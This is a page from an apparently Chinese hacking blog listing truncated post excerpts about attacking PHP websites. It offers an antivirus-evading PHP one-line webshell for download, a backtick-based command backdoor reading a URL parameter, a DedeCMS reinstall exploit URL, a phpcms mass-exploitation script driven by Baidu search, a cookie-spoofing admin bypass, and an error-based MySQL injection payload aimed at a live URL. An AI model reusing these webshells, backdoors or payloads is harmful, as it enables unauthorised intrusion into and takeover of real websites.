dedecms 躺着也中枪 爆重装漏洞

分类:安全 | 2013-06-30 | 撸过 3,011 次
4人扯谈

利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

dedecms死的太冤枉了. apache的原因.

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

分类:新闻 | 2012-05-7 | 撸过 1,705 次
4人扯谈

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。

另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。

那么利用它能做什么呢?我给出如下两个R[......]

继续阅读

Zend加密 免杀PHP一句话藐视所有IIS防御软件

分类:工具 | 2012-04-27 | 撸过 1,860 次
1人扯谈

话不多 直接截图。。。 抓紧下!

PHP一句话密码:caidao

 

下载地址:caidao

网盘下载:caidao.zip

文件大小:1 KB

win2008下如何快速安装PHP,并做好安全设置

分类:技术 | 2012-04-3 | 撸过 1,119 次
2人扯谈

虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Server 2008。

 

在Windows Server 2008下配置PHP环境特别的快,只需要鼠标点点就可以了。

 

1,下载PHP5.2系列版本,目前5.2系列比5.3系列兼容性更好。其中又分为Non Thread Safe和Thread Safe版本,如果要用FastCGI模式运行PHP,就选择Non Thread Safe[......]

继续阅读

phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 1,483 次
0人扯谈
<?php
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file(‘url.txt’);
if (in[......]

继续阅读

搜一次 cms php 通杀

分类:安全 | 2012-03-5 | 撸过 872 次
1人扯谈

洞文件 admin 目录下的 admin_loginstate.php

看代码

if(empty($_COOKIE['S_AdminID'])){
  echo "<script>window.location='admin_login.php'</script>";
  exit;
  }
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){[......]

继续阅读

一个官方没有公布的php秘籍,可用作后门

分类:安全 | 2012-03-3 | 撸过 1,515 次
1人扯谈

发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET['r'];
echo `$test`;
?>

大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webs[......]

继续阅读

php 源码审计之 cookies 欺骗

分类:安全 | 2012-02-23 | 撸过 808 次
0人扯谈

ebycms是一套手机音乐cms系统

直接上代码

admin目录下的in.php

<?php require_once('L:/wamp/www//fern.php');
Annotation("L:\wamp\www\eby\admin\in.php_0");

define(EBY_IN,TRUE);
define('ADMIN_ROOT',  str_replace("\","/",dirname(__FILE__))."/");
define('EBY_ROOT',dirname(ADMIN_ROOT).'/');

require_once (EBY_ROOT.'contr[......]

继续阅读

PHP遍历单目录可写权限脚本

分类:工具 | 2012-02-19 | 撸过 709 次
0人扯谈
PHP遍历单目录可写权限脚本

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />[......]

继续阅读

php+mysql高级爆错注入经测算有效

分类:安全 | 2012-02-19 | 撸过 2,379 次
1人扯谈

之前想找个测试 没想到这有 可以测试下做个记录而已

https://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003[......]

继续阅读

第 1 页,共 4 页1234